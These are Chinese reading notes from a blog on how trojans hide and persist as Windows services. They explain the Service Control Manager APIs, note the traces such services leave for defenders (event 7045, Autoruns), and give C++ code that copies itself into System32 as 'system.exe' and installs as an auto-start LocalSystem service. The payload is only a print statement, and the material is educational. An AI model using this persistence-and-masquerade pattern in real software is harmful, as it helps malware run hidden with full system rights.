• 木马隐藏技术(2) 服务


    此为《木马技术揭秘与防御》系列读书笔记


    windows 服务

    包括四大部分:

    • 服务控制管理器 Service Control Manager(SCM)
    • 服务控制程序 Service Control Program
    • 服务程序 Service Program
    • 服务配置程序 Service Configuration Program

    使用服务的好处:

    • 可以“自启动”,多了一种自启动(持久化)方式
    • 在用户登录前开始运行,且 lpServiceStartName 为 NULL 时以 LocalSystem 账户运行,因此木马常在服务启动时加入关闭杀毒软件/防火墙的代码
    • 在后台运行,没有窗口,不容易被用户直接发现
    • 防御视角:安装服务会写入 HKLM\SYSTEM\CurrentControlSet\Services,并在系统日志中产生事件 7045(已安装服务);用 sc query、services.msc 或 Autoruns 都能枚举到,所以这种“隐藏”只是不显眼,并非不可见

    常用Windows API:

    SC_HANDLE WINAPI OpenSCManager(
      __in_opt  LPCTSTR lpMachineName,  // If the pointer is NULL or points to an empty string, the function connects to the service control manager on the local computer.
      __in_opt  LPCTSTR lpDatabaseName, // 数据库  If it is NULL, the SERVICES_ACTIVE_DATABASE database is opened by default.
      __in      DWORD dwDesiredAccess   // 例如 SC_MANAGER_ALL_ACCESS;按最小权限原则,创建服务只需 SC_MANAGER_CREATE_SERVICE,两者都需要管理员权限
    );

    SCManager:服务控制管理器

    包含几方面的信息:

    1.已安装服务数据库:在注册表中拥有一个已安装服务的数据库,位于:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services(CurrentControlSet 是指向当前生效的 ControlSet00N 的链接,排查时应以它为准)

    2.自启动服务:系统启动时,SCManager 启动所有启动类型为“自动”的服务,和相关依赖服务。在注册表中的位置为:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceGroupOrder

    3.服务记录列表:包含每个服务的一堆属性

    4.因要求而启动的服务、服务控制管理器句柄 等等。

    SERVICE_STATUS_HANDLE WINAPI RegisterServiceCtrlHandler(  //Registers a function to handle service control requests.
      __in  LPCTSTR lpServiceName,
      __in  LPHANDLER_FUNCTION lpHandlerProc  
    );

    注册处理服务控制请求的函数指针

    BOOL WINAPI SetServiceStatus(  // Updates the service control manager's status information for the calling service.
      __in  SERVICE_STATUS_HANDLE hServiceStatus,
      __in  LPSERVICE_STATUS lpServiceStatus
    );

    设置服务的状态。SERVICE_STATUS 结构体成员较多,但除 dwServiceType、dwCurrentState 和 dwControlsAccepted 需要正确填写外,其余一般填 0 即可。

    SC_HANDLE WINAPI CreateService(
      __in       SC_HANDLE hSCManager,  //利用 OpenSCManager 获得SCManager句柄
      __in       LPCTSTR lpServiceName, // 自己定义,是服务的内部名称(注册表 Services 下的键名,net start / sc 命令用的就是它)
      __in_opt   LPCTSTR lpDisplayName, // 自己定义,是服务管理器界面中显示的名称(“描述”栏要另用 ChangeServiceConfig2 设置)
      __in       DWORD dwDesiredAccess,  // 应给 SERVICE_* 权限(如 SERVICE_ALL_ACCESS),而不是 SC_MANAGER_ALL_ACCESS;后者是管理器句柄的权限位,下面的示例代码误用了它
      __in       DWORD dwServiceType,   
      __in       DWORD dwStartType,
      __in       DWORD dwErrorControl,
      __in_opt   LPCTSTR lpBinaryPathName,
      __in_opt   LPCTSTR lpLoadOrderGroup,
      __out_opt  LPDWORD lpdwTagId,
      __in_opt   LPCTSTR lpDependencies,
      __in_opt   LPCTSTR lpServiceStartName, // 运行服务的账户;为 NULL 时以 LocalSystem 运行(本地最高权限,也是木马选它的原因)
      __in_opt   LPCTSTR lpPassword          // 上述账户的密码;LocalSystem 时为 NULL
    );

    创建服务。

    代码示例:

      1 #include <iostream>
      2 #include <windows.h>
      3 #include <string>
      4 #include <string.h>
      5 #include <winsvc.h>
      6 
        using namespace std;

        // Shared service state: the status record reported to the SCM, the handle
        // returned by RegisterServiceCtrlHandler, and the run flag cleared on STOP.
        SERVICE_STATUS        m_ServiceStatus;
        SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
        BOOL                  bRunning = TRUE;

        // Forward declarations; the definitions follow main().
        void WINAPI ServiceMain(DWORD, LPTSTR *);
        void WINAPI ServiceCtrlHandle(DWORD);
        BOOL InstallCmdService();
        void RemoveCmdService();
        void door();
     18 
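        // Entry point. "-i" installs the service, "-r" removes it; with no switch
        // the process assumes the SCM launched it and hands control to the dispatcher.
        int main(int argc, char* argv[])
        {
            SERVICE_TABLE_ENTRYA DispatchTable[] =
            {
                {"system", ServiceMain},
                {NULL, NULL}
            };

            if (2 == argc) {
                // Install/remove are console actions: report the outcome and exit
                // instead of falling through to the dispatcher, which only succeeds
                // when this process was started by the SCM.
                if (!stricmp(argv[1], "-i")) {
                    return InstallCmdService() ? 0 : 1;
                }
                if (!stricmp(argv[1], "-r")) {
                    RemoveCmdService();
                    return 0;
                }
            }

            // Blocks until every service in the table has stopped. From a plain
            // console this fails with ERROR_FAILED_SERVICE_CONTROLLER_CONNECT (1063).
            if (!StartServiceCtrlDispatcher(DispatchTable)) {
                std::cout << "StartServiceCtrlDispatcher failed, error " << GetLastError() << std::endl;
                return 1;
            }
            return 0;
        }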
     38 
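        // Service entry run by the dispatcher on its own thread. Registers the
        // control handler, reports RUNNING, runs the payload, then reports STOPPED
        // so the SCM does not see the process disappear while still marked running.
        void WINAPI ServiceMain(DWORD dwArgc, LPTSTR * lpArgv)
        {
            // Must agree with the dwServiceType passed to CreateService (own process);
            // the original reported SERVICE_WIN32, which is the union of both bits.
            m_ServiceStatus.dwServiceType             = SERVICE_WIN32_OWN_PROCESS;
            m_ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
            m_ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
            m_ServiceStatus.dwWin32ExitCode           = 0;
            m_ServiceStatus.dwServiceSpecificExitCode = 0;
            m_ServiceStatus.dwCheckPoint              = 0;
            m_ServiceStatus.dwWaitHint                = 0;

            // The name must equal the one in the dispatch table.
            m_ServiceStatusHandle = RegisterServiceCtrlHandler("system", ServiceCtrlHandle);
            if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0) {
                return;   // without a handle nothing can be reported to the SCM
            }

            m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
            if (!SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus)) {
                return;   // the SCM never saw RUNNING; do not run the payload
            }
            bRunning = TRUE;

            door();

            // Report a clean exit before this thread returns.
            m_ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
            m_ServiceStatus.dwWin32ExitCode = 0;
            SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
        }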
     61 
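        // Control handler. Every accepted control must be answered with
        // SetServiceStatus, otherwise the SCM keeps the stale state; the original
        // only reported STOP, so PAUSE/CONTINUE/INTERROGATE were never acknowledged.
        void WINAPI ServiceCtrlHandle(DWORD Opcode)
        {
            switch (Opcode) {
            case SERVICE_CONTROL_PAUSE:
                m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
                break;
            case SERVICE_CONTROL_CONTINUE:
                m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
                break;
            case SERVICE_CONTROL_STOP:
                m_ServiceStatus.dwWin32ExitCode = 0;
                m_ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
                m_ServiceStatus.dwCheckPoint    = 0;
                m_ServiceStatus.dwWaitHint      = 0;
                bRunning = FALSE;
                break;
            case SERVICE_CONTROL_INTERROGATE:
                break;    // just re-report the current status below
            default:
                return;   // unknown control: leave the status untouched
            }
            SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus);
        }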
     83 
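        // Copies this executable to <system dir>\system.exe and registers it as an
        // auto-start service named "system". Returns TRUE only when the service was
        // created. Needs administrative rights (write access to the system directory
        // plus SC_MANAGER_CREATE_SERVICE); the service runs as LocalSystem because
        // lpServiceStartName is NULL.
        BOOL InstallCmdService()
        {
            // Path of the running executable (first argument NULL = current process).
            char strDir[1024];
            DWORD len = GetModuleFileName(NULL, strDir, sizeof(strDir));
            if (len == 0 || len >= sizeof(strDir)) {
                std::cout << "GetModuleFileName failed or path truncated" << std::endl;
                return FALSE;
            }

            char chSysPath[1024];
            UINT sysLen = GetSystemDirectory(chSysPath, sizeof(chSysPath));
            if (sysLen == 0 || sysLen >= sizeof(chSysPath)) {
                std::cout << "GetSystemDirectory failed" << std::endl;
                return FALSE;
            }
            // Bounded append; the original strcat had no length check.
            strncat(chSysPath, "\\system.exe", sizeof(chSysPath) - sysLen - 1);

            std::cout << "strdir:" << strDir << std::endl;
            std::cout << "sysPath:" << chSysPath << std::endl;
            // bFailIfExists = FALSE: an existing system.exe is overwritten.
            if (!CopyFile(strDir, chSysPath, FALSE)) {
                std::cout << "Copy file failed, error " << GetLastError() << std::endl;
                return FALSE;   // the original went on to register a missing binary
            }
            std::cout << "Copy file success!" << std::endl;

            // Least privilege: only the right needed to create a service.
            SC_HANDLE schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
            if (schSCManager == NULL) {
                std::cout << "open scmanager failed! may be you have no privilege to do this." << std::endl;
                return FALSE;
            }

            // Quote the binary path: the SCM resolves an unquoted path containing
            // spaces component by component, which is a well-known hijack vector.
            std::string binPath = std::string("\"") + chSysPath + "\"";
            SC_HANDLE schService = CreateService(schSCManager, "system", "system",
                                                 SERVICE_ALL_ACCESS,   // service rights, not SC_MANAGER_* bits
                                                 SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START,
                                                 SERVICE_ERROR_NORMAL, binPath.c_str(),
                                                 NULL, NULL, NULL, NULL, NULL);
            BOOL ok = (schService != NULL);
            if (ok) {
                std::cout << "install service success!" << std::endl;
                CloseServiceHandle(schService);
            } else {
                std::cout << "CreateService failed, error " << GetLastError() << std::endl;
            }
            CloseServiceHandle(schSCManager);   // the original leaked this on every path
            return ok;
        }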
    121 
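        // Stops (if running) and deletes the "system" service. Every SCM call is
        // checked; the original carried on with NULL handles after failures.
        void RemoveCmdService()
        {
            SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
            if (scm == NULL) {
                std::cout << "OpenSCManager Error" << std::endl;
                return;
            }

            // Only the rights this function uses: query, stop, delete.
            SC_HANDLE service = OpenService(scm, "system",
                                            SERVICE_QUERY_STATUS | SERVICE_STOP | DELETE);
            if (!service) {
                std::cout << "OpenService Failed" << std::endl;
                CloseServiceHandle(scm);
                return;
            }

            SERVICE_STATUS status;
            if (!QueryServiceStatus(service, &status)) {
                std::cout << "QueryServiceStatus ERROR" << std::endl;
                status.dwCurrentState = SERVICE_STOPPED;   // unknown state: skip the stop attempt
            }

            if (status.dwCurrentState != SERVICE_STOPPED) {
                if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) {
                    std::cout << "ControlService ERROR!" << std::endl;
                }
                // Poll for STOPPED instead of a blind Sleep(500): DeleteService on a
                // still-running service only marks it for deletion.
                for (int i = 0; i < 20 && status.dwCurrentState != SERVICE_STOPPED; ++i) {
                    Sleep(500);
                    if (!QueryServiceStatus(service, &status)) {
                        break;
                    }
                }
            }

            if (!DeleteService(service)) {
                std::cout << "delete service error" << std::endl;
            } else {
                std::cout << "delete service success!" << std::endl;
            }

            CloseServiceHandle(service);
            CloseServiceHandle(scm);
        }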
    161 
        // Payload placeholder: in the book's example it only announces itself.
        // NOTE(review): a service started by the SCM normally has no console, so
        // this line is presumably only visible when the binary is run directly — verify.
        void door()
        {
            const char* banner = "hi, trojan is running, haha!";
            std::cout << banner << '\n';
            std::cout.flush();
        }

     使用方法:

    编译的程序为hi.exe

    1.安装服务:hi -i 

    hi.exe 会被复制到系统目录(GetSystemDirectory 返回的路径,通常是 C:\Windows\System32)下并命名为 system.exe;安装的服务名为 system。写入该目录和创建服务都需要管理员权限。

    2.启动服务:net start system

    3.卸载服务:hi -r

  • 原文地址:https://www.cnblogs.com/handt/p/2627228.html